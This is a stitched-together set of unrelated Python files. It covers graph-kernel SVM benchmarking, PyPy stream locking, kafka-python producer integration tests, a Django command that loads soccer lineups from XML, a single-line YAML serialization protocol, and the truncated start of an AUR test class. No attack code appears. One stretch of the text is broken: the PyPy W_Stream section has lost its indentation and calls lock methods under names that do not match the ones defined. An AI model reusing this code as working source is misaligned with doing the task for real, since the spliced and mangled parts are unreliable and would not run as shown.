    G, y = dataset_d.data, dataset_d.target
    # Train-test split of graph data
    G_train, G_test, y_train, y_test = train_test_split(G, y, test_size=0.1)
    for (i, k) in enumerate(rows):
        print(k, end=" ")
        gk = GraphKernel(kernel=kernels[k], normalize=True)
        print("", end=".")
        # Calculate the kernel matrix (timed: fit on train, project test).
        start = time.time()
        K_train = gk.fit_transform(G_train)
        K_test = gk.transform(G_test)
        end = time.time()
        print("", end=".")
        # Initialise an SVM and fit on the precomputed kernel matrix.
        clf = svm.SVC(kernel='precomputed')
        clf.fit(K_train, y_train)
        print("", end=". ")
        # Predict and test.
        y_pred = clf.predict(K_test)
        # Calculate accuracy of classification and record "time ~ accuracy".
        data_kernel.append(
            sec_to_time(round(end - start, 2)) +
            " ~ " + str(round(accuracy_score(y_test, y_pred)*100, 2)) + "%")
        print(data_kernel[-1])
    data_dataset.append(data_kernel)
    print("")
# Print results on a table using pyplot (kernels as rows, datasets as columns).
bbox = [0.45, 0.25, 0.6, 0.6]
table = plt.table(cellText=[list(q) for q in zip(*data_dataset)],
                  rowLabels=rows, colLabels=columns, cellLoc = 'center',
                  rowLoc = 'center', loc='center', bbox=bbox)
_ = plt.axis('off')
plt.show()
|
import py
from rpython.rlib import streamio
from rpython.rlib.streamio import StreamErrors
from pypy.interpreter.error import OperationError, oefmt
from pypy.interpreter.baseobjspace import ObjSpace, W_Root, CannotHaveLock
from pypy.interpreter.typedef import TypeDef
from pypy.interpreter.gateway import interp2app
from pypy.interpreter.streamutil import wrap_streamerror, wrap_oserror_as_ioerror
class W_AbstractStream(W_Root):
    """Base class for interp-level objects that expose streams to app-level"""
    # Lock state: the lock itself and the execution context that owns it.
    slock = None
    slockowner = None
    # Locking issues:
    # * Multiple threads can access the same W_AbstractStream in
    #   parallel, because many of the streamio calls eventually
    #   release the GIL in some external function call.
    # * Parallel accesses have bad (and crashing) effects on the
    #   internal state of the buffering levels of the stream in
    #   particular.
    # * We can't easily have a lock on each W_AbstractStream because we
    #   can't translate prebuilt lock objects.
    # We are still protected by the GIL, so the easiest is to create
    # the lock on-demand.
    def __init__(self, space, stream):
        self.space = space
        self.stream = stream
    def _try_acquire_lock(self):
        """Acquire the stream lock; return False if this thread already holds it.

        Blocks if another live thread currently holds the lock.
        """
        # this function runs with the GIL acquired so there is no race
        # condition in the creation of the lock
        me = self.space.getexecutioncontext() # used as thread ident
        if self.slockowner is not None:
            if self.slockowner is me:
                return False # already acquired by the current thread
            # A dead owner forfeits the lock; recreate it fresh below.
            if self.slockowner.thread_disappeared:
                self.slockowner = None
                self.slock = None
        try:
            if self.slock is None:
                self.slock = self.space.allocate_lock()
        except CannotHaveLock:
            # Threadless build: no lock is possible, proceed unlocked.
            pass
        else:
            self.slock.acquire(True)
        assert self.slockowner is None
        self.slockowner = me
        return True
    def _release_lock(self):
        """Drop ownership and release the underlying lock, if any."""
        self.slockowner = None
        if self.slock is not None:
            self.slock.release()
    def lock(self):
        """App-level lock(): error out on re-entrant acquisition."""
        if not self._try_acquire_lock():
            raise oefmt(self.space.w_RuntimeError, "stream lock already held")
    def unlock(self):
        """App-level unlock(): only the owning thread may release."""
        me = self.space.getexecutioncontext() # used as thread ident
        if self.slockowner is not me:
            raise oefmt(self.space.w_RuntimeError, "stream lock is not held")
        self._release_lock()
    def _cleanup_(self):
        # remove the lock object, which will be created again as needed at
        # run-time.
        self.slock = None
        assert self.slockowner is None
    def stream_read(self, n):
        """
        An interface for direct interp-level usage of W_AbstractStream,
        e.g. from interp_marshal.py.
        NOTE: this assumes that the stream lock is already acquired.
        Like os.read(), this can return less than n bytes.
        """
        try:
            return self.stream.read(n)
        except StreamErrors as e:
            # Translate low-level stream errors into app-level exceptions.
            raise wrap_streamerror(self.space, e)
    def do_write(self, data):
        """
        An interface for direct interp-level usage of W_Stream,
        e.g. from interp_marshal.py.
        NOTE: this assumes that the stream lock is already acquired.
        """
        try:
            self.stream.write(data)
        except StreamErrors as e:
            raise wrap_streamerror(self.space, e)
# ____________________________________________________________
class W_Stream(W_AbstractStream):
"""A class that exposes the raw stream interface to app-level."""
# this exists for historical reasons, and kept around in case we want
# to re-expose the raw stream interface to app-level.
for name, argtypes in streamio.STREAM_METHODS.iteritems():
numargs = len(argtypes)
args = ", ".join(["v%s" % i for i in range(numargs)])
exec py.code.Source("""
def %(name)s(self, space, %(args)s):
acquired = self.try_acquire_lock()
try:
try:
result = self.stream.%(name)s(%(args)s)
except streamio.StreamError, e:
raise OperationError(space.w_ValueError,
space.wrap(e.message))
except OSError, e:
raise wrap_oserror_as_ioerror(space, e)
finally:
if acquired:
self.release_lock()
return space.wrap(result)
%(name)s.unwrap_spec = [W_Stream, ObjSpace] + argtypes
""" % locals()).compile() in globals()
# Expose the generated stream methods plus explicit lock/unlock at app-level.
W_Stream.typedef = TypeDef("Stream",
    lock = interp2app(W_Stream.lock),
    unlock = interp2app(W_Stream.unlock),
    **dict([(name, interp2app(globals()[name]))
            for name, _ in streamio.STREAM_METHODS.iteritems()]))
|
<filename>test/test_producer_integration.py
import os
import time
import uuid
from six.moves import range
from kafka import (
SimpleProducer, KeyedProducer,
create_message, create_gzip_message, create_snappy_message,
RoundRobinPartitioner, HashedPartitioner
)
from kafka.codec import has_snappy
from kafka.common import (
FetchRequest, ProduceRequest,
UnknownTopicOrPartitionError, LeaderNotAvailableError
)
from test.fixtures import ZookeeperFixture, KafkaFixture
from test.testutil import KafkaIntegrationTestCase, kafka_versions
class TestKafkaProducerIntegration(KafkaIntegrationTestCase):
    """Integration tests for SimpleProducer/KeyedProducer against a real broker.

    A Zookeeper + Kafka fixture pair is started once per class (only when the
    KAFKA_VERSION environment variable is set). All messages go to a single
    two-partition topic, and results are verified by fetching back from the
    broker and comparing offsets.

    NOTE(review): the ``async=True`` keyword used below is from the legacy
    kafka-python API and is a syntax error on Python 3.7+, so this module is
    Python 2 / early Python 3 only.
    """
    # All tests produce to (and fetch from) this fixed topic.
    topic = b'produce_topic'
    @classmethod
    def setUpClass(cls):  # noqa
        """Start the Zookeeper and Kafka fixtures (skipped without KAFKA_VERSION)."""
        if not os.environ.get('KAFKA_VERSION'):
            return
        cls.zk = ZookeeperFixture.instance()
        cls.server = KafkaFixture.instance(0, cls.zk.host, cls.zk.port)
    @classmethod
    def tearDownClass(cls):  # noqa
        """Stop the fixtures in reverse start order."""
        if not os.environ.get('KAFKA_VERSION'):
            return
        cls.server.close()
        cls.zk.close()
    @kafka_versions("all")
    def test_produce_many_simple(self):
        # Two consecutive batches of 100; offsets must advance contiguously.
        start_offset = self.current_offset(self.topic, 0)
        self.assert_produce_request(
            [create_message(("Test message %d" % i).encode('utf-8'))
             for i in range(100)],
            start_offset,
            100,
        )
        self.assert_produce_request(
            [create_message(("Test message %d" % i).encode('utf-8'))
             for i in range(100)],
            start_offset+100,
            100,
        )
    @kafka_versions("all")
    def test_produce_10k_simple(self):
        start_offset = self.current_offset(self.topic, 0)
        self.assert_produce_request(
            [create_message(("Test message %d" % i).encode('utf-8'))
             for i in range(10000)],
            start_offset,
            10000,
        )
    @kafka_versions("all")
    def test_produce_many_gzip(self):
        # Each gzip message wraps 100 inner messages, so offsets move by 200.
        start_offset = self.current_offset(self.topic, 0)
        message1 = create_gzip_message([
            ("Gzipped 1 %d" % i).encode('utf-8') for i in range(100)])
        message2 = create_gzip_message([
            ("Gzipped 2 %d" % i).encode('utf-8') for i in range(100)])
        self.assert_produce_request(
            [ message1, message2 ],
            start_offset,
            200,
        )
    @kafka_versions("all")
    def test_produce_many_snappy(self):
        self.skipTest("All snappy integration tests fail with nosnappyjava")
        start_offset = self.current_offset(self.topic, 0)
        self.assert_produce_request([
            create_snappy_message(["Snappy 1 %d" % i for i in range(100)]),
            create_snappy_message(["Snappy 2 %d" % i for i in range(100)]),
            ],
            start_offset,
            200,
        )
    @kafka_versions("all")
    def test_produce_mixed(self):
        # Mix of a plain message and a compressed batch in one request.
        start_offset = self.current_offset(self.topic, 0)
        msg_count = 1+100
        messages = [
            create_message(b"Just a plain message"),
            create_gzip_message([
                ("Gzipped %d" % i).encode('utf-8') for i in range(100)]),
        ]
        # All snappy integration tests fail with nosnappyjava
        if False and has_snappy():
            msg_count += 100
            messages.append(create_snappy_message(["Snappy %d" % i for i in range(100)]))
        self.assert_produce_request(messages, start_offset, msg_count)
    @kafka_versions("all")
    def test_produce_100k_gzipped(self):
        start_offset = self.current_offset(self.topic, 0)
        self.assert_produce_request([
            create_gzip_message([
                ("Gzipped batch 1, message %d" % i).encode('utf-8')
                for i in range(50000)])
            ],
            start_offset,
            50000,
        )
        self.assert_produce_request([
            create_gzip_message([
                ("Gzipped batch 1, message %d" % i).encode('utf-8')
                for i in range(50000)])
            ],
            start_offset+50000,
            50000,
        )
    ############################
    #   SimpleProducer Tests   #
    ############################
    @kafka_versions("all")
    def test_simple_producer(self):
        start_offset0 = self.current_offset(self.topic, 0)
        start_offset1 = self.current_offset(self.topic, 1)
        producer = SimpleProducer(self.client)
        # Goes to first partition, randomly.
        resp = producer.send_messages(self.topic, self.msg("one"), self.msg("two"))
        self.assert_produce_response(resp, start_offset0)
        # Goes to the next partition, randomly.
        resp = producer.send_messages(self.topic, self.msg("three"))
        self.assert_produce_response(resp, start_offset1)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one"), self.msg("two") ])
        self.assert_fetch_offset(1, start_offset1, [ self.msg("three") ])
        # Goes back to the first partition because there's only two partitions
        resp = producer.send_messages(self.topic, self.msg("four"), self.msg("five"))
        self.assert_produce_response(resp, start_offset0+2)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one"), self.msg("two"), self.msg("four"), self.msg("five") ])
        producer.stop()
    @kafka_versions("all")
    def test_produce__new_topic_fails_with_reasonable_error(self):
        new_topic = 'new_topic_{guid}'.format(guid = str(uuid.uuid4())).encode('utf-8')
        producer = SimpleProducer(self.client)
        # At first it doesn't exist
        with self.assertRaises((UnknownTopicOrPartitionError,
                                LeaderNotAvailableError)):
            producer.send_messages(new_topic, self.msg("one"))
    @kafka_versions("all")
    def test_producer_random_order(self):
        # With random_start, consecutive sends alternate partitions, so the
        # 1st and 3rd batch land together and differ from the 2nd.
        producer = SimpleProducer(self.client, random_start = True)
        resp1 = producer.send_messages(self.topic, self.msg("one"), self.msg("two"))
        resp2 = producer.send_messages(self.topic, self.msg("three"))
        resp3 = producer.send_messages(self.topic, self.msg("four"), self.msg("five"))
        self.assertEqual(resp1[0].partition, resp3[0].partition)
        self.assertNotEqual(resp1[0].partition, resp2[0].partition)
    @kafka_versions("all")
    def test_producer_ordered_start(self):
        # Without random_start the rotation deterministically begins at 0.
        producer = SimpleProducer(self.client, random_start = False)
        resp1 = producer.send_messages(self.topic, self.msg("one"), self.msg("two"))
        resp2 = producer.send_messages(self.topic, self.msg("three"))
        resp3 = producer.send_messages(self.topic, self.msg("four"), self.msg("five"))
        self.assertEqual(resp1[0].partition, 0)
        self.assertEqual(resp2[0].partition, 1)
        self.assertEqual(resp3[0].partition, 0)
    @kafka_versions("all")
    def test_round_robin_partitioner(self):
        start_offset0 = self.current_offset(self.topic, 0)
        start_offset1 = self.current_offset(self.topic, 1)
        producer = KeyedProducer(self.client, partitioner=RoundRobinPartitioner)
        # Keys are ignored by round-robin: sends alternate partitions 0/1.
        resp1 = producer.send(self.topic, self.key("key1"), self.msg("one"))
        resp2 = producer.send(self.topic, self.key("key2"), self.msg("two"))
        resp3 = producer.send(self.topic, self.key("key3"), self.msg("three"))
        resp4 = producer.send(self.topic, self.key("key4"), self.msg("four"))
        self.assert_produce_response(resp1, start_offset0+0)
        self.assert_produce_response(resp2, start_offset1+0)
        self.assert_produce_response(resp3, start_offset0+1)
        self.assert_produce_response(resp4, start_offset1+1)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one"), self.msg("three") ])
        self.assert_fetch_offset(1, start_offset1, [ self.msg("two"), self.msg("four") ])
        producer.stop()
    @kafka_versions("all")
    def test_hashed_partitioner(self):
        start_offset0 = self.current_offset(self.topic, 0)
        start_offset1 = self.current_offset(self.topic, 1)
        producer = KeyedProducer(self.client, partitioner=HashedPartitioner)
        resp1 = producer.send(self.topic, self.key("1"), self.msg("one"))
        resp2 = producer.send(self.topic, self.key("2"), self.msg("two"))
        resp3 = producer.send(self.topic, self.key("3"), self.msg("three"))
        resp4 = producer.send(self.topic, self.key("3"), self.msg("four"))
        resp5 = producer.send(self.topic, self.key("4"), self.msg("five"))
        # Recompute the expected partition per key (hash(key) % 2) and track
        # the expected offset/message list per partition.
        offsets = {0: start_offset0, 1: start_offset1}
        messages = {0: [], 1: []}
        keys = [self.key(k) for k in ["1", "2", "3", "3", "4"]]
        resps = [resp1, resp2, resp3, resp4, resp5]
        msgs = [self.msg(m) for m in ["one", "two", "three", "four", "five"]]
        for key, resp, msg in zip(keys, resps, msgs):
            k = hash(key) % 2
            offset = offsets[k]
            self.assert_produce_response(resp, offset)
            offsets[k] += 1
            messages[k].append(msg)
        self.assert_fetch_offset(0, start_offset0, messages[0])
        self.assert_fetch_offset(1, start_offset1, messages[1])
        producer.stop()
    @kafka_versions("all")
    def test_acks_none(self):
        # ACK_NOT_REQUIRED: no broker response, but the message still lands.
        start_offset0 = self.current_offset(self.topic, 0)
        producer = SimpleProducer(self.client, req_acks=SimpleProducer.ACK_NOT_REQUIRED)
        resp = producer.send_messages(self.topic, self.msg("one"))
        self.assertEqual(len(resp), 0)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
        producer.stop()
    @kafka_versions("all")
    def test_acks_local_write(self):
        start_offset0 = self.current_offset(self.topic, 0)
        producer = SimpleProducer(self.client, req_acks=SimpleProducer.ACK_AFTER_LOCAL_WRITE)
        resp = producer.send_messages(self.topic, self.msg("one"))
        self.assert_produce_response(resp, start_offset0)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
        producer.stop()
    @kafka_versions("all")
    def test_acks_cluster_commit(self):
        start_offset0 = self.current_offset(self.topic, 0)
        producer = SimpleProducer(
            self.client,
            req_acks=SimpleProducer.ACK_AFTER_CLUSTER_COMMIT)
        resp = producer.send_messages(self.topic, self.msg("one"))
        self.assert_produce_response(resp, start_offset0)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
        producer.stop()
    @kafka_versions("all")
    def test_batched_simple_producer__triggers_by_message(self):
        # Batch flushes once batch_send_every_n=5 messages have accumulated.
        start_offset0 = self.current_offset(self.topic, 0)
        start_offset1 = self.current_offset(self.topic, 1)
        producer = SimpleProducer(self.client,
                                  batch_send=True,
                                  batch_send_every_n=5,
                                  batch_send_every_t=20)
        # Send 5 messages and do a fetch
        resp = producer.send_messages(self.topic,
            self.msg("one"),
            self.msg("two"),
            self.msg("three"),
            self.msg("four"),
        )
        # Batch mode is async. No ack
        self.assertEqual(len(resp), 0)
        # It hasn't sent yet
        self.assert_fetch_offset(0, start_offset0, [])
        self.assert_fetch_offset(1, start_offset1, [])
        resp = producer.send_messages(self.topic,
            self.msg("five"),
            self.msg("six"),
            self.msg("seven"),
        )
        # Batch mode is async. No ack
        self.assertEqual(len(resp), 0)
        self.assert_fetch_offset(0, start_offset0, [
            self.msg("one"),
            self.msg("two"),
            self.msg("three"),
            self.msg("four"),
        ])
        self.assert_fetch_offset(1, start_offset1, [
            self.msg("five"),
        #    self.msg("six"),
        #    self.msg("seven"),
        ])
        producer.stop()
    @kafka_versions("all")
    def test_batched_simple_producer__triggers_by_time(self):
        # Batch flushes after batch_send_every_t=5 seconds, not by count.
        start_offset0 = self.current_offset(self.topic, 0)
        start_offset1 = self.current_offset(self.topic, 1)
        producer = SimpleProducer(self.client,
                                  batch_send=True,
                                  batch_send_every_n=100,
                                  batch_send_every_t=5)
        # Send 5 messages and do a fetch
        resp = producer.send_messages(self.topic,
            self.msg("one"),
            self.msg("two"),
            self.msg("three"),
            self.msg("four"),
        )
        # Batch mode is async. No ack
        self.assertEqual(len(resp), 0)
        # It hasn't sent yet
        self.assert_fetch_offset(0, start_offset0, [])
        self.assert_fetch_offset(1, start_offset1, [])
        resp = producer.send_messages(self.topic,
            self.msg("five"),
            self.msg("six"),
            self.msg("seven"),
        )
        # Batch mode is async. No ack
        self.assertEqual(len(resp), 0)
        # Wait the timeout out
        time.sleep(5)
        self.assert_fetch_offset(0, start_offset0, [
            self.msg("one"),
            self.msg("two"),
            self.msg("three"),
            self.msg("four"),
        ])
        self.assert_fetch_offset(1, start_offset1, [
            self.msg("five"),
            self.msg("six"),
            self.msg("seven"),
        ])
        producer.stop()
    @kafka_versions("all")
    def test_async_simple_producer(self):
        start_offset0 = self.current_offset(self.topic, 0)
        producer = SimpleProducer(self.client, async=True)
        resp = producer.send_messages(self.topic, self.msg("one"))
        self.assertEqual(len(resp), 0)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
        producer.stop()
    @kafka_versions("all")
    def test_async_keyed_producer(self):
        start_offset0 = self.current_offset(self.topic, 0)
        producer = KeyedProducer(self.client, partitioner = RoundRobinPartitioner, async=True)
        resp = producer.send(self.topic, self.key("key1"), self.msg("one"))
        self.assertEqual(len(resp), 0)
        self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
        producer.stop()
    def assert_produce_request(self, messages, initial_offset, message_ct):
        """Produce to partition 0 and verify the broker offset advanced by message_ct."""
        produce = ProduceRequest(self.topic, 0, messages=messages)
        # There should only be one response message from the server.
        # This will throw an exception if there's more than one.
        resp = self.client.send_produce_request([ produce ])
        self.assert_produce_response(resp, initial_offset)
        self.assertEqual(self.current_offset(self.topic, 0), initial_offset + message_ct)
    def assert_produce_response(self, resp, initial_offset):
        """Assert a single error-free produce response at the expected offset."""
        self.assertEqual(len(resp), 1)
        self.assertEqual(resp[0].error, 0)
        self.assertEqual(resp[0].offset, initial_offset)
    def assert_fetch_offset(self, partition, start_offset, expected_messages):
        """Fetch from the broker and assert exactly expected_messages are present."""
        # There should only be one response message from the server.
        # This will throw an exception if there's more than one.
        resp, = self.client.send_fetch_request([ FetchRequest(self.topic, partition, start_offset, 1024) ])
        self.assertEqual(resp.error, 0)
        self.assertEqual(resp.partition, partition)
        messages = [ x.message.value for x in resp.messages ]
        self.assertEqual(messages, expected_messages)
        self.assertEqual(resp.highwaterMark, start_offset+len(expected_messages))
|
<reponame>awyrough/xsoccer
### Read from F9 files and construct Lineup models
import utils.xmls as xml_utils
import datetime
import os
import time
from teams.models import Team
from games.models import Game
from players.models import Player
from lineups.models import Lineup
from django.core.management.base import BaseCommand
def is_tag(xml_obj, tag):
    """Return True when the XML element's tag name equals *tag*."""
    return tag == xml_obj.tag
def is_tag_and_type(xml_obj, tag, type):
    """Return True when the element matches *tag* and its "Type" attribute equals *type*."""
    # Short-circuit on the tag so the attribute is only read when relevant.
    if xml_obj.tag != tag:
        return False
    return xml_utils.get_attrib(xml_obj, "Type") == type
class Command(BaseCommand):
    """Management command that builds Lineup rows from Opta F9 match files.

    Sample usage:
    python manage.py build_lineup_table_ALL_FILES \
    --dry_run \
    --data_filepath=data/f9/
    """
    # NOTE(review): help text says "game table" but this command populates
    # the Lineup table -- confirm before changing the user-facing string.
    help = "Populate game table"

    def add_arguments(self, parser):
        """Add custom CLI arguments"""
        parser.add_argument(
            "--dry_run",
            action="store_true",
            dest="dry_run",
            default=False,
            help="Don't save and just print teams",
        )
        parser.add_argument(
            "--data_filepath",
            dest="data_filepath",
            type=str,
            required=True,
            help="Filepath containing all data files to load",
        )

    def handle(self, *args, **options):
        """Walk data_filepath, parse each F9 XML file, and save new Lineups.

        A lineup is skipped when the (game, player) pair already exists in
        the database; with --dry_run nothing is saved, only counted.
        """
        script_start = time.time()
        data_filepath = options["data_filepath"]
        is_dry_run = options["dry_run"]
        print "Importing Lineups from %s" % data_filepath
        if is_dry_run:
            print "This is a dry run and will not save any data"
        # Counters for the end-of-run audit summary.
        potential_save_count = 0
        saved_count = 0
        pull_count = 0
        file_count = 0
        for root_dir, sub_dirs, filenames in os.walk(data_filepath):
            for f in filenames:
                file_start = time.time()
                # Ignore anything that is not an .xml file (e.g. the hidden
                # .DS_Store files macOS drops into directories).
                if f[-4:] != ".xml":
                    continue
                file_count += 1
                file_saved_count = 0
                # NOTE(review): joins against data_filepath rather than
                # root_dir, so files inside nested sub-directories would not
                # resolve -- confirm the data directory is flat.
                xml_file = os.path.join(data_filepath, f)
                new_lineups = []
                # Open up F9 and find root: <SoccerFeed>
                xml_data_root = xml_utils.get_root_from_file(xml_file)
                # Find <SoccerDocument>
                xml_SoccerDocument = xml_utils.get_tag(xml_data_root, "SoccerDocument")
                # Evaluate if the game has two SoccerDocument components; if so, ignore the repeat
                if xml_utils.get_child_count(xml_data_root, "SoccerDocument") == 2:
                    xml_MatchData = xml_utils.get_tag(xml_SoccerDocument, "MatchData")
                    xml_MatchInfo = xml_utils.get_tag(xml_MatchData, "MatchInfo")
                    match_type = xml_utils.get_attrib(xml_MatchInfo,"MatchType")
                    if match_type == "1st Leg":
                        continue #skip the first leg if two legs in file (aka file is for 2nd leg)
                game_uuid = xml_utils.get_attrib(xml_SoccerDocument, "uID")
                db_game = Game.objects.get(uuid=game_uuid)
                # Find <MatchData>
                xml_MatchData = xml_utils.get_tag(xml_SoccerDocument, "MatchData")
                # Find <TeamData> children (one per team in the match).
                for team_data in xml_utils.get_children(xml_MatchData):
                    if is_tag(team_data,"TeamData") == False:
                        continue #skip if it's not an actual <TeamData> team
                    team_uuid = xml_utils.get_attrib(team_data, "TeamRef")
                    db_team = Team.objects.get(uuid=team_uuid)
                    # Comb through <TeamData> and only pull the "formation_used" team Stat
                    team_formation = xml_utils.get_tag_and_type(team_data, "Stat", "formation_used").text
                    # Find the XML object <PlayerLineUp>
                    xml_PlayerLineUp = xml_utils.get_tag(team_data, "PlayerLineUp")
                    # Check if TeamData is empty (aka the game was postponed)
                    if xml_PlayerLineUp is None:
                        continue
                    # Iterate over players on a team
                    for xml_MatchPlayer in xml_utils.get_children(xml_PlayerLineUp):
                        # find player
                        player_uuid = xml_utils.get_attrib(xml_MatchPlayer,"PlayerRef")
                        db_player = Player.objects.get(uuid=player_uuid)
                        # find player position (SubPosition is optional)
                        player_position = xml_utils.get_attrib(xml_MatchPlayer,"Position")
                        player_subposition = xml_utils.get_attrib_if_exists(xml_MatchPlayer,"SubPosition")
                        # find if player is captain; normalize the optional
                        # attribute into a strict boolean
                        is_captain = xml_utils.get_attrib_if_exists(xml_MatchPlayer,"Captain")
                        if is_captain: #if it exists, make variable a True boolean
                            is_captain = True
                        else:
                            is_captain = False
                        # formation_place defaults to 0 when absent/empty
                        formation_place = xml_utils.get_tag_and_type(xml_MatchPlayer, "Stat", "formation_place").text
                        if formation_place:
                            formation_place = int(formation_place)
                        else:
                            formation_place = int(0)
                        lineup = Lineup(
                            game=db_game
                            ,team=db_team
                            ,player=db_player
                            ,team_formation=team_formation
                            ,player_position=player_position
                            ,player_subposition=player_subposition
                            ,is_captain=is_captain
                            ,player_formation_number=formation_place
                            )
                        new_lineups.append(lineup)
                        pull_count += 1
                # get all existing objects, just want for the game/player;
                # this is admittedly slow for game/players where the data is already populated; shouldn't be too bad though
                existing_lineups = Lineup.objects.filter(game=db_game)
                existing_players = [str(i.player.uuid) for i in existing_lineups]
                # log out for audit and save if not dry run and it is a new team
                for lineup in new_lineups:
                    if is_dry_run == True and lineup.player.uuid not in existing_players:
                        potential_save_count += 1
                    elif is_dry_run == False and lineup.player.uuid not in existing_players:
                        lineup.save()
                        saved_count += 1
                        file_saved_count += 1
                        #print lineup
                file_end = time.time()
                print "# files parsed = %s; saved Lineups = %s; file time = %s secs; closing %s..." % (str(file_count), (file_saved_count), (file_end - file_start), f)
        print "\n# lineups pulled from files = %s" % (str(pull_count))
        print "\n# lineups that would've been saved to DB = %s" % (str(potential_save_count))
        print "\n# lineups actually saved to DB = %s" % (str(saved_count))
        script_end = time.time()
        print "\n%s minutes to complete script" % ((script_end - script_start) / 60)
# Copyright 2012 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represent data in single-line YAML.
:py:class:`YAMLProtocol` can handle nearly any data type, and can serve as a
more readable alternative to :py:class:`~mrjob.protocol.PickleProtocol`.
As with pickle, you should be careful about reading untrusted data with this
protocol, because it can execute arbitrary code; also, this format is
Python-specific.
:py:class:`SafeYAMLProtocol` supports basic YAML data types, which are
a superset of JSON data types, and are supported across YAML implementations.
We also provide :py:class:`YAMLValueProtocol` and :py:class:`SafeYAMLValueProtocol`
to handle values without keys.
"""
from __future__ import absolute_import
import yaml
import six
from mr3px.common import decode_string, encode_string
__all__ = [
'SafeYAMLProtocol',
'SafeYAMLValueProtocol',
'YAMLProtocol',
'YAMLValueProtocol',
]
def dump_inline(data, allow_unicode=None, encoding=None, safe=False):
    """Dump YAML on a single line.

    :param data: the object to serialize.
    :param allow_unicode: Don't escape non-ASCII characters in the result.
    :param encoding: Optional character encoding to use. If not set,
                     return unicode
    :param safe: if True, use :py:func:`yaml.safe_dump`; that is, only encode
                 basic value types; otherwise use :py:func:`yaml.dump`
    """
    dump = yaml.safe_dump if safe else yaml.dump
    out = dump(
        data,
        allow_unicode=allow_unicode,
        # Any true value selects flow style, which keeps output on one line
        # (the original passed the truthy string 'block', which was misleading).
        default_flow_style=True,
        explicit_end=False,
        explicit_start=False,
        line_break='\n',
        width=float('inf')).rstrip()
    # Scalar documents get a bare document-end marker ('...') appended by
    # yaml; strip it so the line contains only the value itself.
    if out.endswith(six.u('\n...')):
        out = out[:-4].rstrip()
    # Honor the documented contract: no encoding means return unicode text.
    # (Previously out.encode(None) raised TypeError.)
    if encoding is None:
        return out
    return out.encode(encoding)
class YAMLProtocolBase(object):
    """Shared machinery for the YAML protocols: encoding configuration plus
    single-line YAML load/dump helpers. Subclasses set ``safe`` to choose
    between safe and full (arbitrary-tag) YAML."""

    # When False, arbitrary Python-specific tags are allowed (unsafe).
    safe = True

    def __init__(self, allow_unicode=False, encoding=None):
        """Optional parameters:

        :param allow_unicode: Allow non-ASCII characters in the output
                              (e.g. accented characters).
        :param encoding: Character encoding to use. We default to UTF-8,
                         with fallback to latin-1 when decoding input.
        """
        self.allow_unicode = allow_unicode
        self.encoding = encoding

    def load(self, data):
        """Deserialize *data* (bytes or unicode) into Python objects."""
        unicode_data = decode_string(data, encoding=self.encoding)
        if self.safe:
            return yaml.safe_load(unicode_data)
        else:
            # PyYAML >= 6 requires an explicit Loader (and 5.x warns without
            # one); yaml.Loader keeps the original "full, arbitrary-code"
            # semantics this protocol documents.
            return yaml.load(unicode_data, Loader=yaml.Loader)

    def dump(self, data):
        """Serialize *data* to single-line YAML bytes (never unicode)."""
        return dump_inline(
            data,
            allow_unicode=self.allow_unicode,
            encoding=self.encoding or 'utf_8',  # never return Unicode
            safe=self.safe)
class SafeYAMLProtocol(YAMLProtocolBase):
    """Tab-separated key/value protocol for basic YAML data types.

    The supported types are a superset of JSON and include most basic data
    structures; for a full list see
    http://pyyaml.org/wiki/PyYAMLDocumentation#YAMLtagsandPythontypes.

    Note that this will encode tuples as lists.
    """

    def read(self, line):
        raw_key, raw_value = decode_string(line, self.encoding).split('\t')
        raw_key = encode_string(raw_key, self.encoding)
        raw_value = encode_string(raw_value, self.encoding)
        # Decode the key only when it differs from the last one seen;
        # repeated keys are the common case in sorted reducer input.
        cached = getattr(self, '_key_cache', (None, None))
        if raw_key != cached[0]:
            cached = (raw_key, self.load(raw_key))
            self._key_cache = cached
        return cached[1], self.load(raw_value)

    def write(self, key, value):
        key_text = decode_string(self.dump(key), encoding=self.encoding)
        value_text = decode_string(self.dump(value), encoding=self.encoding)
        return encode_string('%s\t%s' % (key_text, value_text), self.encoding)
class YAMLProtocol(SafeYAMLProtocol):
    """Tab-separated key/value protocol that round-trips virtually any
    Python object using full (unsafe) YAML."""

    safe = False
class SafeYAMLValueProtocol(YAMLProtocolBase):
    """Value-only protocol for basic YAML data types (a superset of JSON;
    see http://pyyaml.org/wiki/PyYAMLDocumentation#YAMLtagsandPythontypes).

    Keys are not used: ``read`` always yields ``None`` as the key, and
    ``write`` discards the key it receives. Tuples are encoded as lists.
    """

    def read(self, line):
        # Value-only mode: there is no key to parse.
        return (None, self.load(line))

    def write(self, _, value):
        encoded = self.dump(value)
        return encoded
class YAMLValueProtocol(SafeYAMLValueProtocol):
    """Value-only protocol that round-trips virtually any Python object
    using full (unsafe) YAML."""

    safe = False
|
import os
from unittest import TestCase
from bauh.gems.arch import aur
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
class AURModuleTest(TestCase):
    """Tests for aur.map_srcinfo across single- and multi-package SRCINFO
    files, with and without restricting the returned fields.

    The original tests repeated the same comparison loop (with slightly
    inconsistent list handling) eight times; it is factored into
    _assert_fields, and fixture loading into _read_srcinfo.
    """

    def _read_srcinfo(self, name):
        """Return the raw contents of a SRCINFO fixture from resources/."""
        with open(FILE_DIR + '/resources/' + name) as f:
            return f.read()

    def _assert_fields(self, res, expected_fields, check_len=True):
        """Assert that *res* contains every expected field.

        List values are compared order-insensitively (both sides sorted in
        place). Sorting res[key] is guarded by an isinstance check so a
        type mismatch surfaces as a clean assertion failure, not an
        AttributeError.

        :param check_len: when True, also require res to carry exactly as
                          many keys as expected_fields.
        """
        if check_len:
            self.assertEqual(len(expected_fields), len(res),
                             "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
        for key, val in expected_fields.items():
            self.assertIn(key, res, "key '{}' not in res".format(key))
